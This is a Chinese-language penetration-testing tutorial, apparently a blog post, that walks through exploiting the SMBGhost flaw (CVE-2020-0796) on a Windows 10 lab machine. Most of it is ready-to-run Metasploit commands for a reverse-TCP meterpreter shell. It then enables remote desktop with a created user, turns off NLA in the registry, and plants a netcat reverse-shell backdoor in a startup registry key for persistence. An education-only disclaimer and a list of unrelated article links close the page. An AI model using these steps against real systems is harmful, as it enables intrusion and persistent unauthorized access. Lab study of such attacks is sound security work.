掌握安全渗透测试:利用永恒之黑漏洞获取Windows 10系统访问权限

以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:

环境介绍

  • 靶机 :IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机 :IP地址为192.168.1.53

靶机准备

  1. 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  2. 检查系统补丁 :确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  3. 开启445端口:确保靶机的445端口(SMB协议)是开放的。

获取Shell

  1. 使用Metasploit框架

    • 启动Metasploit:msfconsole
    • 使用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost
  2. 设置选项

    • 显示模块选项:show options
    • 设置目标主机IP:set RHOSTS 192.168.1.60
    • 设置payload:set payload windows/x64/meterpreter/reverse_tcp
    • 设置攻击机监听IP:set LHOST 192.168.1.53
    • 禁用模拟模式:set DefangedMode false
  3. 执行exploit

    • 运行exploit:exploit

创建新用户并开启远程桌面

  1. 开启RDP远程桌面

    • 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
  2. 创建RDP用户

    • 设置用户名和密码:set username xuegodset password 123456
    • 指定会话ID:set session 1
    • 运行模块:run
  3. 检查NLA设置

    • 查询注册表以确定是否开启网络级身份验证(NLA)。
  4. 关闭NLA(如果开启):

    • 修改注册表值SecurityLayerUserAuthentication为0,以允许非NLA的RDP连接。
  5. 连接远程桌面

    • 在Kali上使用rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60

开启后门维持权限访问

  1. 配置后门程序

    • 上传nc(Netcat)到Windows 10系统。
    • 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
  2. 设置防火墙规则

    • 允许443端口的网络访问,以使后门有效。
  3. 重启Windows 10

    • 重启靶机以应用更改,并等待后门程序运行。
  4. 连接后门

    • 在Kali上使用nc命令连接后门:nc -v 192.168.1.60 443
  5. MSF控制台连接(可选):

    • 在Metasploit框架中使用connect命令连接到后门:connect 192.168.1.60 443

总结

  • 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。

相关推荐
Blossom.11811 分钟前
使用Python和OpenCV实现图像识别与目标检测
人工智能·python·神经网络·opencv·安全·目标检测·机器学习
2501_9160074728 分钟前
绕过 Xcode?使用 Appuploader和主流工具实现 iOS 上架自动化
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9160137429 分钟前
使用 Windows 完成 iOS 应用上架:Appuploader对比其他证书与上传方案
websocket·网络协议·tcp/ip·http·网络安全·https·udp
Java Fans32 分钟前
如何在Windows本机安装Python并确保与Python.NET兼容
开发语言·windows·python
网硕互联的小客服1 小时前
如何防止服务器被用于僵尸网络(Botnet)攻击 ?
网络·网络安全·ddos
电报号dapp1192 小时前
加密货币钱包开发指南:多链资产管理与非托管安全范式
安全·web3·去中心化·区块链·智能合约
淡水猫.2 小时前
Next.js 中间件鉴权绕过漏洞 CVE-2025-29927
javascript·安全·web安全·中间件
zskj_zhyl3 小时前
智绅科技 —— 智慧养老 + 数字健康,构筑银发时代安全防护网
人工智能·科技·安全
立控信息(lkone)3 小时前
库室联管联控系统
大数据·安全
cai_huaer3 小时前
BugKu Web渗透之需要管理员
安全